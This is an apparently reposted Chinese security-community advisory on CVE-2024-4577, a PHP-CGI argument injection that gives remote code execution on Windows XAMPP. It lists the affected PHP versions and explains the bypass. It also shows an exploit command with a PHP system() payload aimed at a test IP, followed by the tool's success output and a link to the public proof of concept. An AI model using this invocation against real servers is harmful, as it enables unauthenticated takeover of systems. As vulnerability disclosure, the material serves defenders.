点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
尽管随着时间的推移,PHP-CGI 已逐渐被淘汰,但此漏洞默认会影响Windows 版 XAMPP,允许未经身份验证的攻击者通过特定字符序列在远程 XAMPP 服务器上执行任意代码。
在实现PHP时,团队没有注意到Windows操作系统中编码转换的Best-Fit特性,这一疏忽使得未经身份验证的攻击者可以通过特定的字符序列绕过此前CVE-2012-1823的防护,通过参数注入攻击在远程PHP服务器上执行任意代码。
基于 DEVCORE 的原始博客文章 (@d3vc0r3) 此漏洞会影响 Windows 操作系统上安装的所有 PHP 版本:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
POC使用:
python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
__ ___ ___________
__ _ ______ _/ |__ ____ | |___ ________ _ ________
/ / __ ___/ ___| | | | / _ / / _ __
/ / __ | | ___| Y | |( <_> / | | /
/_/ (____ |__| ___ |___|__|__ | __ / /_/ |__|
/ / /
watchTowr-vs-php_cve-2024-4577.py
(*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
- Aliz Hammond, watchTowr ([email protected])
- Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)
(+) Exploit was successful
POC地址
https://github.com/watchtowrlabs/CVE-2024-4577
原文始发于微信公众号(SecHub网络安全社区):CVE-2024-4577 | PHP漏洞导致XAMPP Windows版RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论